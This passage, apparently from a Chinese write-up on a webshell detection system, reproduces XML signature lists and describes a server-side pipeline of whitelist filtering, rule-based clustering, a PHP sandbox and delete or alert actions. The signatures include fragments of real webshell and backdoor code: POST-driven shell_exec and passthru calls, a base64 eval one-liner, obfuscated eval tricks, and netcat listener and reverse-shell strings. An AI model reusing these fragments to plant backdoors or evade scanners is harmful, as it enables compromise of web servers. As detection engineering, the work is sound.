<ITEM><STR>c80shell</STR><NUM>80</NUM></ITEM> <ITEM><STR>NGHshell</STR><NUM>80</NUM></ITEM> <ITEM><STR>Xgr0upVN</STR><NUM>80</NUM></ITEM> <ITEM><STR>call_user_func</STR><NUM>10</NUM></ITEM> <ITEM><STR>fsockopen</STR><NUM>20</NUM></ITEM> <ITEM><STR>tools88.com</STR><NUM>80</NUM></ITEM> <ITEM><STR>EgY_SpIdEr</STR><NUM>80</NUM></ITEM> <ITEM><STR>XXDD0S</STR><NUM>80</NUM></ITEM> <ITEM><STR>cha88.cn</STR><NUM>80</NUM></ITEM> <ITEM><STR>SECFORCE</STR><NUM>80</NUM></ITEM> <ITEM><STR>webshell</STR><NUM>40</NUM></ITEM> <ITEM><STR>auto_prepend_file</STR><NUM>10</NUM></ITEM> <ITEM><STR>Guama_</STR><NUM>80</NUM></ITEM> <ITEM><STR>Qingma_</STR><NUM>80</NUM></ITEM> <ITEM><STR>Antivirus_e</STR><NUM>80</NUM></ITEM> <ITEM><STR>Exec_g</STR><NUM>80</NUM></ITEM> <ITEM><STR>admin_spiderpass</STR><NUM>30</NUM></ITEM> <ITEM><STR>Shell (SPS-3.0)</STR><NUM>80</NUM></ITEM> <ITEM><STR>Spider PHP Shell</STR><NUM>80</NUM></ITEM> <ITEM><STR>SELECT cmd FROM a INTO DUMPFILE</STR><NUM>80</NUM></ITEM> <ITEM><STR>net start Terminal Services</STR><NUM>80</NUM></ITEM> <ITEM><STR>SELECT spider FROM Spider_Temp_Tab</STR><NUM>80</NUM></ITEM> <ITEM><STR>base64_decode($back_connect</STR><NUM>80</NUM></ITEM> <ITEM><STR>k1r4fsearch</STR><NUM>20</NUM></ITEM> <ITEM><STR>fuckanquangoutezheng</STR><NUM>80</NUM></ITEM> <ITEM><STR>PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw</STR><NUM>80</NUM></ITEM> <ITEM><STR>'\'a\'eis','e'.'v'.'a'.'l'.'($g($b($enfile)))','a'</STR><NUM>80</NUM></ITEM> <ITEM><STR>3vWW7F6DsceDRT0dKtBX2rqX5Fh9tJDJpG71Byr5Th6TsbPulbB8Gmg3</STR><NUM>80</NUM></ITEM> <ITEM><STR>GUuDQ0KJAAAAAAAAABe6Dg9GolWbhqJVm4aiVZu8pZdbhuJVm6ZlVhuF4lW</STR><NUM>80</NUM></ITEM> <ITEM><STR>$entry_line="HACKed by EntriKa";</STR><NUM>80</NUM></ITEM> <ITEM><STR>cont=replace(cont,"href=""","href=""?gov.cn.")</STR><NUM>80</NUM></ITEM> <ITEM><STR>$dez = $pwddir."/".$real;</STR><NUM>40</NUM></ITEM> <ITEM><STR>echo "FILE UPLOADED TO $dez"</STR><NUM>40</NUM></ITEM> <ITEM><STR>"R0lGODlhWAKWAOf</STR><NUM>80</NUM></ITEM> <ITEM><STR>$ydosya2 = fopen("$ydosya", 'w')</STR><NUM>40</NUM></ITEM> <ITEM><STR>fwrite($ydosya2, $kodlar)</STR><NUM>40</NUM></ITEM> <ITEM><STR>if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {</STR><NUM>80</NUM></ITEM> <ITEM><STR>cat /tmp/cmdtemp; rm /tmp/cmdtemp</STR><NUM>80</NUM></ITEM> <ITEM><STR><![CDATA[href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incdbpass=$mypass&incdbname=$col_value']]></STR><NUM>80</NUM></ITEM> <ITEM><STR>$pwdump2="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ</STR><NUM>80</NUM></ITEM> <ITEM><STR>MyShell: can't change directory.\n$work_dir</STR><NUM>80</NUM></ITEM> <ITEM><STR>if(get_magic_quotes_gpc())$shellOut=stripslashes($shellOut)</STR><NUM>80</NUM></ITEM> <ITEM><STR>$fow=($ow["name"]?$ow["name"]:fileowner($f))."/".($gr["name"]?$gr["name"]:filegroup($f));</STR><NUM>80</NUM></ITEM> <ITEM><STR>if(file_exists("c:\\windows\\system32\\"))$dir="c:\\\\windows\\\\system32\\\\mysqlDll.dll"</STR><NUM>80</NUM></ITEM> <ITEM><STR>WWW.XXDDOS.COM</STR><NUM>60</NUM></ITEM> <ITEM><STR>$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65</STR><NUM>80</NUM></ITEM> <ITEM><STR><![CDATA[form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST]]></STR><NUM>80</NUM></ITEM> <ITEM><STR>JCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5P</STR><NUM>80</NUM></ITEM> <ITEM><STR><![CDATA[URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d]]></STR><NUM>80</NUM></ITEM> <ITEM><STR>$liz0zim=shell_exec($_POST[liz0])</STR><NUM>80</NUM></ITEM> <ITEM><STR>dHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAMUExURf///wAAAJmZzAAAA</STR><NUM>80</NUM></ITEM> <ITEM><STR>744zdMGn59wNZsz05tcH40pO/GcCgDzJj+e</STR><NUM>80</NUM></ITEM> <ITEM><STR>((!isset($key))?($key=implode('`, `',array_keys($line))):null);</STR><NUM>80</NUM></ITEM> <ITEM><STR>+dWMMMMMNm+,`+ltltlzz??+1lltltv+^.jdMMMMMMHA+</STR><NUM>80</NUM></ITEM> <ITEM><STR>;@passthru($cmd);$ret = @ob_get_contents();@ob_end_clean();</STR><NUM>80</NUM></ITEM> <ITEM><STR>hYSMtmdpZNpy8ZY6hBlJJxBWSVC5FiGoIRJzgYAXAW</STR><NUM>80</NUM></ITEM> <ITEM><STR>Calistirmak istediginiz komutu buraya girin</STR><NUM>80</NUM></ITEM> <ITEM><STR>@oOo00o0OOo0o000000O($_GET["pass"]</STR><NUM>80</NUM></ITEM> <ITEM><STR>AAOqXl6gAAO2kpOJvb9IeHtuOj88QENYwMHUAANASEt9hYbAAAIwAAHkAAD0AAL0AAN5aWtQpK</STR><NUM>80</NUM></ITEM> <ITEM><STR>'.getenv("HTTP_HOST").' - Antichat Shell</STR><NUM>80</NUM></ITEM> <ITEM><STR>move_uploaded_file($userfile, "entrika.php"); </STR><NUM>80</NUM></ITEM> <ITEM><STR>$curcmd = "cd ".$curdir.";".$curcmd</STR><NUM>60</NUM></ITEM> <ITEM><STR>php passthru(getenv("HTTP_ACCEPT_LANGUAGE")); echo '</STR><NUM>80</NUM></ITEM> <ITEM><STR>TDWGKJ3Ai1/BCtiO9grefEeAoU46gAwUDUuI4udXxGGoG</STR><NUM>80</NUM></ITEM> <ITEM><STR>udp://$ooooo00oo0000oo0oo0oo00ooo0ooo0o0o0</STR><NUM>80</NUM></ITEM> <ITEM><STR>mailto:crazy_king@turkusev.net</STR><NUM>80</NUM></ITEM> <ITEM><STR>yH5BAEKAAEALAAAAAARAA0AAAIdjA9wy6gNQ4pwUmav0yvn+hhJiI3mCJ6otrIkxxQAOw==</STR><NUM>80</NUM></ITEM> <ITEM><STR>if (!empty($unset_surl)) {setcookie("c80sh_surl"); $surl = "";}</STR><NUM>80</NUM></ITEM> <ITEM><STR>$pro=$pro1.$pro2.$pro3.$pro4.$pro5.$pro6.$pro7.$pro8;</STR><NUM>80</NUM></ITEM> <ITEM><STR>${'_'.$_}['_'](${'_'.$_}['__'])</STR><NUM>80</NUM></ITEM> <PHPRULE> <ITEM>[^\w](eval|assert|popen|proc_open|shell_exec|passthru)\(([^\(\),]*)(\$_GET|\$_COOKIE|\$_POST|\$_SESSION|\$_REQUEST)\[(.{1,20})\]\)</ITEM> <ITEM>[^\w](eval|assert|popen|proc_open|shell_exec|passthru|system|create_function)\(([^\(\)]*)stripslashes\((\$_GET|\$_POST|\$_COOKIE|\$_SESSION|\$_REQUEST)\[(.{1,20})\]\)</ITEM> <ITEM>strrev\(([^\(]*)edoced_46esab([^\(]*)\)</ITEM> <ITEM>fputs\(fopen\([^\(\)]*\),[^\(\)]*(\$_GET|\$_POST|\$_COOKIE|\$_SESSION|\$_REQUEST)\[(.{1,20})\]</ITEM> <ITEM>[^\>](\$_GET|\$_POST)\[[^\(\)\{\}\[\]]{0,8}\]\((\$_GET|\$_POST)\[</ITEM> <ITEM>[^\w]eval\((\$_GET|\$_POST)\[.{0,34}\]\)</ITEM> <ITEM>(chr.{1,50}){6}</ITEM> <ITEM>(0o){20}</ITEM> </PHPRULE> </WEBSHELL> <INFORMATION> <ITEM><STR>set_time_limit(999999</STR><NUM>70</NUM></ITEM> <ITEM><STR>DDOS</STR><NUM>40</NUM></ITEM> <ITEM><STR>SYN</STR><NUM>40</NUM></ITEM> <ITEM><STR>phpddos</STR><NUM>40</NUM></ITEM> <ITEM><STR>socket_create(AF_INET, SOCK_STREAM, SOL_TCP)</STR><NUM>10</NUM></ITEM> <ITEM><STR>phpddos.com</STR><NUM>70</NUM></ITEM> <ITEM><STR>fsockopen("tcp://</STR><NUM>70</NUM></ITEM> <ITEM><STR>fsockopen("udp://</STR><NUM>70</NUM></ITEM> <ITEM><STR>fsockopen("udp://</STR><NUM>70</NUM></ITEM> <ITEM><STR>buyer_nick</STR><NUM>40</NUM></ITEM> <ITEM><STR>receiver_mobile</STR><NUM>40</NUM></ITEM> <ITEM><STR>receiver_address</STR><NUM>40</NUM></ITEM> <PHPRULE> <ITEM></ITEM> </PHPRULE> </INFORMATION> <SEO> <ITEM><STR>$html = file_get_contents($url, false, $context)</STR><NUM>70</NUM></ITEM> <ITEM><STR>'content.txt'</STR><NUM>20</NUM></ITEM> <ITEM><STR>'key.txt'</STR><NUM>20</NUM></ITEM> <ITEM><STR>file_get_contents</STR><NUM>40</NUM></ITEM> <ITEM><STR>set_time_limit(9999</STR><NUM>10</NUM></ITEM> <ITEM><STR>if(!file_exists(</STR><NUM>10</NUM></ITEM> <ITEM><STR>mkdir($</STR><NUM>20</NUM></ITEM> <ITEM><STR>mt_rand</STR><NUM>20</NUM></ITEM> <ITEM><STR>fopen</STR><NUM>20</NUM></ITEM> <ITEM><STR>str_replace</STR><NUM>20</NUM></ITEM> <PHPRULE> <ITEM></ITEM> </PHPRULE> </SEO> <EXT> <ITEM>.php</ITEM> <ITEM>.php4</ITEM> <ITEM>.php5</ITEM> <ITEM>.inc</ITEM> </EXT> <ADDITIONALRULL> <WEBSHELL> <ITEM> <STR>chr(99).chr(104).chr(114)</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>$_REQUEST</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>array_map(</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>stop_</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>PCT4BA6ODSE_</STR> <!-- 利用数组生成_POST和BASE64_DECODE--> <NUM>80</NUM> </ITEM> <ITEM> <STR>array_walk</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>\x65\x76\x61\x6c</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>/*-/*-*/</STR> <!-- 利用注释绕过 --> <NUM>80</NUM> </ITEM> <ITEM> <STR>substr</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.phpdp.org</STR> <NUM>80</NUM> </ITEM> </PHPRULE> <ITEM>["']?[aA]["']?\.?["']?[sS]["']?\.?["']?[sS]["']?\.?["']?[eE]["']?\.?["']?[rR]["']?\.?["']?[tT]["']?</ITEM> <ITEM>["']?[eE]["']?\.?["']?[vV]["']?\.?["']?[aA]["']?\.?["']?[lL]["']?</ITEM> <ITEM>["']?_["']?\.?["']?[pP]["']?\.?["']?[oO]["']?\.?["']?[sS]["']?\.?["']?[tT]["']?</ITEM> <ITEM>["']?[Ss]["']?\.?["']?[tT]["']?\.?["']?[Rr]["']?\.?["']?_["']?\.?["']?[rR]["']?\.?["']?[eE]["']?\.?["']?[pP]["']?\.?["']?[lL]["']?\.?["']?[aA]["']?\.?["']?[cC]["']?\.?["']?[eE]["']?</ITEM> <ITEM>["']?[pP]["']?\.?["']?[rR]["']?\.?["']?[eE]["']?\.?["']?[gG]["']?\.?["']?_["']?\.?["']?[rR]["']?\.?["']?[eE]["']?\.?["']?[pP]["']?\.?["']?[lL]["']?\.?["']?[aA]["']?\.?["']?[cC]["']?\.?["']?[eE]["']?</ITEM> <ITEM>["']?[eE]["']?\.?["']?[xX]["']?\.?["']?[eE]["']?\.?["']?[cC]["']?</ITEM> <ITEM>["']?[pP]["']?\.?["']?[oO]["']?\.?["']?[pP]["']?\.?["']?[eE]["']?\.?["']?[nN]["']?</ITEM> <ITEM>["']?[sS]["']?\.?["']?[yY]["']?\.?["']?[sS]["']?\.?["']?[tT]["']?\.?["']?[eE]["']?\.?["']?[mM]["']?</ITEM> <ITEM>["']?[pP]["']?\.?["']?[aA]["']?\.?["']?[sS]["']?\.?["']?[sS]["']?\.?["']?[tT]["']?\.?["']?[hH]["']?\.?["']?[rR]["']?\.?["']?[uU]["']?</ITEM> <ITEM>["']?[pP]["']?\.?["']?[rR]["']?\.?["']?[oO]["']?\.?["']?[cC]["']?\.?["']?_["']?\.?["']?[oO]["']?\.?["']?[pP]["']?\.?["']?[eE]["']?\.?["']?[Nn]["']?</ITEM> <ITEM>["']?[Ss]["']?\.?["']?[hH]["']?\.?["']?[eE]["']?\.?["']?[lL]["']?\.?["']?[lL]["']?\.?["']?_["']?\.?["']?[eE]["']?\.?["']?[xX]["']?\.?["']?[eE]["']?\.?["']?[cC]["']?</ITEM> </PHPRULE> </WEBSHELL> </ADDITIONALRULL> </PHP> <JAVA> <WEBSHELL> <ITEM><STR>n1nty</STR><NUM>80</NUM></ITEM> <ITEM><STR>request.getParameter("f"))).write(request.getParameter("t").getBytes()</STR><NUM>80</NUM></ITEM> <ITEM><STR>request.getParameter("path")</STR><NUM>20</NUM></ITEM> <ITEM><STR>request.getRealPath(request.getServletPath())</STR><NUM>60</NUM></ITEM> <ITEM><STR>Command Window</STR><NUM>20</NUM></ITEM> <ITEM><STR>JSP Manage-System</STR><NUM>80</NUM></ITEM> <ITEM><STR>JspSpy</STR><NUM>80</NUM></ITEM> <ITEM><STR>net localgroup</STR><NUM>80</NUM></ITEM> <ITEM><STR>cmd.exe</STR><NUM>50</NUM></ITEM> <ITEM><STR>Jfolder</STR><NUM>80</NUM></ITEM> <ITEM><STR>jshell</STR><NUM>80</NUM></ITEM> <ITEM><STR>pwnshell</STR><NUM>80</NUM></ITEM> <ITEM><STR>ServerSocket(</STR><NUM>80</NUM></ITEM> <ITEM><STR>jsp File browser</STR><NUM>80</NUM></ITEM> <ITEM><STR>/bin/sh</STR><NUM>20</NUM></ITEM> <ITEM><STR>Backdoor</STR><NUM>50</NUM></ITEM> <ITEM><STR>Runtime.getRuntime()</STR><NUM>50</NUM></ITEM> <ITEM><STR>.exec(</STR><NUM>30</NUM></ITEM> <ITEM><STR>cmd /c</STR><NUM>80</NUM></ITEM> <ITEM><STR>"cmd", "/C"</STR><NUM>80</NUM></ITEM> <ITEM><STR>kj021320</STR><NUM>80</NUM></ITEM> <ITEM><STR>fuckanquangoutezheng</STR><NUM>80</NUM></ITEM> <ITEM><STR><![CDATA[document.openfile.action=\"" + curUri + "&curPath=" + pathConvert(curFile.getParent()) + "\" + fileName + \"&fsAction=saveAs\";\n"]]></STR><NUM>80</NUM></ITEM> <ITEM><STR>javascript:delFile('"+folderReplace(file)+"')</STR><NUM>80</NUM></ITEM> <ITEM><STR>rt.exec("cmd.exe")</STR><NUM>40</NUM></ITEM> <ITEM><STR>JSP Backdoor Reverse Shell</STR><NUM>80</NUM></ITEM> <ITEM><STR>"\"" + boundary + "\" is an illegal boundary indicator"</STR><NUM>80</NUM></ITEM> <ITEM><STR>$Id: TelnetIO.java,v 1.10 1808/02/09 10:22:18 leo Exp $</STR><NUM>80</NUM></ITEM> <JSPRULE> <ITEM></ITEM> </JSPRULE> </WEBSHELL> <INFORMATION> <ITEM></ITEM> <JSPRULE> <ITEM></ITEM> </JSPRULE> </INFORMATION> <SEO> <ITEM></ITEM> <JSPRULE> <ITEM></ITEM> </JSPRULE> </SEO> <EXT> <ITEM>.jsp</ITEM> </EXT> </JAVA> <SCRIPT> <WEBSHELL> <ITEM><STR>buyer_nick</STR><NUM>20</NUM></ITEM> <ITEM><STR>receiver_mobile</STR><NUM>20</NUM></ITEM> <ITEM><STR>receiver_address</STR><NUM>30</NUM></ITEM> <ITEM><STR>backdoor</STR><NUM>60</NUM></ITEM> <ITEM><STR>PORT SCANNER</STR><NUM>70</NUM></ITEM> <ITEM><STR>DDOS</STR><NUM>70</NUM></ITEM> <ITEM><STR>Scanning $host</STR><NUM>70</NUM></ITEM> <ITEM><STR>nc -vv -l</STR><NUM>70</NUM></ITEM> <ITEM><STR>IO::Socket</STR><NUM>70</NUM></ITEM> <ITEM><STR>connect(</STR><NUM>30</NUM></ITEM> <ITEM><STR>system(</STR><NUM>30</NUM></ITEM> <ITEM><STR>sys/ioctl.ph</STR><NUM>30</NUM></ITEM> <ITEM><STR>/bin/sh</STR><NUM>30</NUM></ITEM> <ITEM><STR>use Socket</STR><NUM>20</NUM></ITEM> <ITEM><STR>open(STDIN</STR><NUM>30</NUM></ITEM> <SCPRULE> <ITEM></ITEM> </SCPRULE> </WEBSHELL> <INFORMATION> <ITEM></ITEM> <SCPRULE> <ITEM></ITEM> </SCPRULE> </INFORMATION> <SEO> <ITEM></ITEM> <SCPRULE> <ITEM></ITEM> </SCPRULE> </SEO> <EXT> <ITEM>.pl</ITEM> <ITEM>.py</ITEM> <ITEM>.sh</ITEM> </EXT> </SCRIPT> </LEX>
0x2: Server检测: 检测准确能力
客户端将疑似WEBSHELL文件上报到服务端之后,服务端的检测思想是进行细粒度的检测,通过精简化、缩小规则范围,识别出100%确定是WEBSHELL的文件,大致检测流程如下
//从客户端上报的疑似WEBSHELL文件大概有300w的数量级 1. 根据文件后缀,加载对应的规则 1) PHP WEBSHELL 1.1) .php 1.2) .php4 1.3) .php5 1.4) .inc 2) ASP WEBSHELL 2.1) .asp 2.2) .asa 2.3) .cer 2.4) .cdx 2.5) .aspx 2.6) .jpg 2.7) .bmp 2.8) .jpeg 2.9) .png 2.10) .gif 2.11) .htr 2.12) .hdx 2.13) .asmx 2.14) .ashx 3) JSP WEBSHELL 3.1) .jsp 2. 通过白名单进行一次过滤,这个名单是根据安全人员经验总结出的规则,命中这些规则的文件一定是正常文件,即服务端检测流程的第一步是过滤掉大部分的误报,如果命中了白名单,则判断流程直接退出,结束判断。这一步的策略是进行正常文件分类(正向分类效果较好) /* <whitelist> <threshold>70</threshold> <ITEM>STR>Web Framework Event Handlers</STR><NUM>70</NUM></ITEM> <ITEM><STR>IISLogFileGUIDToENName</STR><NUM>70</NUM></ITEM> <ITEM><STR>!--#include file="</STR><NUM>70</NUM></ITEM> <ITEM><STR>require(dirname(__FILE__)</STR><NUM>20</NUM></ITEM> <ITEM><STR>"../inc/</STR><NUM>70</NUM></ITEM> <ITEM><STR>WScript\.shell|PHP\s?Shell|Eval\sPHP\sCode</STR><NUM>70</NUM></ITEM> <ITEM><STR>thinkphp.cn All rights reserved</STR><NUM>70</NUM></ITEM> <ITEM><STR>Public GIF89a</STR><NUM>70</NUM></ITEM> <ITEM><STR>base64_decode|\beval\(gzdecode|\beval\((\$_POST|\$_GET|\$_COOKIE)</STR><NUM>70</NUM></ITEM> <ITEM><STR>KFwkXyhHRVR8UE9TVHxDT09LSUV8UkVRVUVTVCkp</STR><NUM>70</NUM></ITEM> <ITEM><STR>require_lib('util/web_util,util/db_util', true)</STR><NUM>70</NUM></ITEM> <ITEM><STR>require_once __DIR__.'/../</STR><NUM>70</NUM></ITEM> <ITEM><STR>include("../../</STR><NUM>70</NUM></ITEM> <ITEM><STR>ImageMagick</STR><NUM>70</NUM></ITEM> <ITEM><STR>pdf2htmlEX</STR><NUM>70</NUM></ITEM> <ITEM><STR>require("../</STR><NUM>70</NUM></ITEM> <ITEM><STR>GIF frame counter</STR><NUM>70</NUM></ITEM> <ITEM><STR>include file="../</STR><NUM>70</NUM></ITEM> <ITEM><STR>config/</STR><NUM>20</NUM></ITEM> <ITEM><STR>"GIF89a</STR><NUM>70</NUM></ITEM> <ITEM><STR>\s*?\\$(_POST|_GET|_REQUEST|GLOBALS</STR><NUM>70</NUM></ITEM> <ITEM><STR>beval\(gzdecode|\beval\((\$_POST|\$_GET|\$_COOKIE)</STR><NUM>70</NUM></ITEM> <ITEM><STR>'GIF89a</STR><NUM>70</NUM></ITEM> <ITEM><STR>www.ajiang.net</STR><NUM>70</NUM></ITEM> <ITEM><STR>http://www.ajiang.net/products/aspcheck/safe.asp</STR><NUM>70</NUM></ITEM> <ITEM><STR>Standard Jet DB</STR><NUM>70</NUM></ITEM> <ITEM><STR>www.itlearner.com</STR><NUM>70</NUM></ITEM> <ITEM><STR>defined('DIR_SECURE_CONTENT')</STR><NUM>40</NUM></ITEM> <ITEM><STR>$GLOBALS['_beginTime']</STR><NUM>40</NUM></ITEM> <ITEM><STR><![CDATA[ <table border=0 width=450 cellspacing=0 cellpadding=0 bgcolor="#3F8805"> ]]></STR><NUM>70</NUM></ITEM> <ITEM><STR>run-tests.php</STR><NUM>70</NUM></ITEM> <ITEM><STR>dim virus(1,7),virus_Regx(1,4)</STR><NUM>70</NUM></ITEM> <ITEM><STR>href="http://7i24.com</STR><NUM>70</NUM></ITEM> <ITEM><STR><![CDATA[<!--#include file = "../]]></STR>aa<NUM>70</NUM></ITEM> <ITEM><STR>| PHP Version 5</STR><NUM>70</NUM></ITEM> <ITEM><STR><![CDATA[<!--#include file =]]></STR><NUM>70</NUM></ITEM> <ITEM><STR>require_once('include</STR><NUM>70</NUM></ITEM> <ITEM><STR>* @author</STR><NUM>20</NUM></ITEM> <ITEM><STR>* @license</STR><NUM>10</NUM></ITEM> <ITEM><STR>* @copyright</STR><NUM>20</NUM></ITEM> <ITEM><STR>#include file="</STR><NUM>70</NUM></ITEM> <ITEM><STR> ThinkPHP</STR><NUM>70</NUM></ITEM> <ITEM><STR>License: GPLv2</STR><NUM>70</NUM></ITEM> <ITEM><STR>.save(request.getParameter("top_session")</STR><NUM>70</NUM></ITEM> <ITEM><STR>GIFDecoder</STR><NUM>70</NUM></ITEM> <ITEM><STR>exit('Access Denied')</STR><NUM>30</NUM></ITEM> <ITEM><STR>if(!defined(</STR><NUM>20</NUM></ITEM> <ITEM><STR>if (!defined('THINK_PATH')) exit()</STR><NUM>70</NUM></ITEM> <ITEM><STR>= microtime(TRUE);</STR><NUM>30</NUM></ITEM> <ITEM><STR>www.nusphere.com</STR><NUM>70</NUM></ITEM> <ITEM><STR>$code_generated = new $_GET['code']($_GET['t'],$color_black</STR><NUM>70</NUM></ITEM> <ITEM><STR>http://php.net/manual/ru/function.exec.php</STR><NUM>70</NUM></ITEM> <ITEM><STR><![CDATA[<!--#include virtual="/ucenter/config/md5.asp"-->]]></STR><NUM>50</NUM></ITEM> <ITEM><STR>->"e"."v"."a"."l"'=>'"e"."v"."a"."l"',</STR><NUM>70</NUM></ITEM> <ITEM><STR>->webshell'=>'webshell',</STR><NUM>70</NUM></ITEM> <ITEM><STR><![CDATA[ shellcode[]= <br>"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b ]]></STR><NUM>70</NUM></ITEM> <ITEM><STR>response.Write(987651234-123498765)</STR><NUM>70</NUM></ITEM> <ITEM><STR>Znothis(</STR><NUM>70</NUM></ITEM> <ITEM><STR>private $webscan_upload="http://upload.webscan.360.cn/index.php";</STR><NUM>70</NUM></ITEM> </whitelist> */ 3. 通过白名单过滤逻辑之后,开始逐步提高检测粒度,从这一步开始,开始逐步采取"反向分类思路",即开始对恶意WEBSHELL进行聚类 最终的检测结果是: YES_WEBSHEL //YES_WEBSHEL的规则是针对不同文件类型独有的 3.1. 如果疑似文件已经通过YES_WEBSHELL的判断,则此时进入"反向恶意WEBSHELL"聚类的最后阶段,即用更加严格,一定能代表WEBSHELL的规则,这一步的聚类是在上一步YES_WEBSHELL聚类的基础上进行的,最终的结果是: DELETE_WEBSHELL //DELETE_WEBSHELL规则是全局的 3.2. 如果DELETE_WEBSHELL未命中,则当前文件继续保持在YES_WEBSHELL状态,即保持高危状态 /* 1. 最终判断为DELETE_WEBSHELL状态的文件的数量级为200+ */ 4. SEO检测 5. 如果YES_WEBSHELL检测失败,则标记为: NOT_WEBSHELL,对于这类文件,则将文件推送到PHP Sandbox中,目前只针对PHP文件,Sandbox会根据动态执行结果返回多种细化的检测结果状态,SERVER根据1:N映射关系进行规范化 1) YES_WEBSHELL 1.1) REGEX_FOUND 1.2) CONTENT_FOUND 1.3) DELETE_MATCH 1.4) GPC_HIT 1.5) REGEX_FOUND_216 1.6) CONTENT_FOUND_216 1.7) GPC_HIT_216 2) DELETE_WEBSHELL 2.1) REGEX_FOUND_216 2.2) CONTENT_FOUND_216 2.3) GPC_HIT_216 //传输给PHP Sandbox的文件数据量大概有50w数量级 6. 全部判断逻辑完成后,进入服务端的ACTION逻辑,即根据判断结果采取不同的文件操作(删除、告警)
1) 一句话WEBSHELL: 如果文件为纯粹的一句话木马,则直接删除
/*
1. pattern: (eval|execute|assert)[^>]*(request|post|get|cookie|\\$_)
2. lenth: < 80
3. ext = aspx || lenth < 150
*/
2) SEO: 删除SEO文件
3) MD5 LIST:检测存在在blacklist黑名单中的文件,这个黑名单来自于判定为YES_WEBSHELL的高疑似文件,由安全团队在banff上人工确认后,点击确认验证后,会添加到MD5 LIST中
4) YES_WEBSHELL: 产生高疑似告警状态,并打标为"待验证",待安全团队验证
5) DELETE_WEBSHELL: 直接向客户端发送删除删除指令
web-shell.xml
<LEX>
<Isparser>0</Isparser>
<Version>20140318-1</Version>
<whitelist>
<threshold>70</threshold>
<ITEM>STR>Web Framework Event Handlers</STR><NUM>70</NUM></ITEM>
<ITEM><STR>IISLogFileGUIDToENName</STR><NUM>70</NUM></ITEM>
<ITEM><STR>!--#include file="</STR><NUM>70</NUM></ITEM>
<ITEM><STR>require(dirname(__FILE__)</STR><NUM>20</NUM></ITEM>
<ITEM><STR>"../inc/</STR><NUM>70</NUM></ITEM>
<ITEM><STR>WScript\.shell|PHP\s?Shell|Eval\sPHP\sCode</STR><NUM>70</NUM></ITEM>
<ITEM><STR>thinkphp.cn All rights reserved</STR><NUM>70</NUM></ITEM>
<ITEM><STR>Public GIF89a</STR><NUM>70</NUM></ITEM>
<ITEM><STR>base64_decode|\beval\(gzdecode|\beval\((\$_POST|\$_GET|\$_COOKIE)</STR><NUM>70</NUM></ITEM>
<ITEM><STR>KFwkXyhHRVR8UE9TVHxDT09LSUV8UkVRVUVTVCkp</STR><NUM>70</NUM></ITEM>
<ITEM><STR>require_lib('util/web_util,util/db_util', true)</STR><NUM>70</NUM></ITEM>
<ITEM><STR>require_once __DIR__.'/../</STR><NUM>70</NUM></ITEM>
<ITEM><STR>include("../../</STR><NUM>70</NUM></ITEM>
<ITEM><STR>ImageMagick</STR><NUM>70</NUM></ITEM>
<ITEM><STR>pdf2htmlEX</STR><NUM>70</NUM></ITEM>
<ITEM><STR>require("../</STR><NUM>70</NUM></ITEM>
<ITEM><STR>GIF frame counter</STR><NUM>70</NUM></ITEM>
<ITEM><STR>include file="../</STR><NUM>70</NUM></ITEM>
<ITEM><STR>config/</STR><NUM>20</NUM></ITEM>
<ITEM><STR>"GIF89a</STR><NUM>70</NUM></ITEM>
<ITEM><STR>\s*?\\$(_POST|_GET|_REQUEST|GLOBALS</STR><NUM>70</NUM></ITEM>
<ITEM><STR>beval\(gzdecode|\beval\((\$_POST|\$_GET|\$_COOKIE)</STR><NUM>70</NUM></ITEM>
<ITEM><STR>'GIF89a</STR><NUM>70</NUM></ITEM>
<ITEM><STR>www.ajiang.net</STR><NUM>70</NUM></ITEM>
<ITEM><STR>http://www.ajiang.net/products/aspcheck/safe.asp</STR><NUM>70</NUM></ITEM>
<ITEM><STR>"preg_replace</STR><NUM>70</NUM></ITEM>
<ITEM><STR>Standard Jet DB</STR><NUM>70</NUM></ITEM>
<ITEM><STR>www.itlearner.com</STR><NUM>70</NUM></ITEM>
<ITEM><STR>defined('DIR_SECURE_CONTENT')</STR><NUM>40</NUM></ITEM>
<ITEM><STR>$GLOBALS['_beginTime']</STR><NUM>40</NUM></ITEM>
<ITEM><STR><![CDATA[
<table border=0 width=450 cellspacing=0 cellpadding=0 bgcolor="#3F8805">
]]></STR><NUM>70</NUM></ITEM>
<ITEM><STR>run-tests.php</STR><NUM>70</NUM></ITEM>
<ITEM><STR>dim virus(1,7),virus_Regx(1,4)</STR><NUM>70</NUM></ITEM>
<ITEM><STR>href="http://7i24.com</STR><NUM>70</NUM></ITEM>
<ITEM><STR><![CDATA[<!--#include file = "../]]></STR>aa<NUM>70</NUM></ITEM>
<ITEM><STR>| PHP Version 5</STR><NUM>70</NUM></ITEM>
<ITEM><STR><![CDATA[<!--#include file =]]></STR><NUM>70</NUM></ITEM>
<ITEM><STR>require_once('include</STR><NUM>70</NUM></ITEM>
<ITEM><STR>* @author</STR><NUM>20</NUM></ITEM>
<ITEM><STR>* @license</STR><NUM>10</NUM></ITEM>
<ITEM><STR>* @copyright</STR><NUM>20</NUM></ITEM>
<ITEM><STR>#include file="</STR><NUM>70</NUM></ITEM>
<ITEM><STR> ThinkPHP</STR><NUM>70</NUM></ITEM>
<ITEM><STR>License: GPLv2</STR><NUM>70</NUM></ITEM>
<ITEM><STR>.save(request.getParameter("top_session")</STR><NUM>70</NUM></ITEM>
<ITEM><STR>GIFDecoder</STR><NUM>70</NUM></ITEM>
<ITEM><STR>exit('Access Denied')</STR><NUM>30</NUM></ITEM>
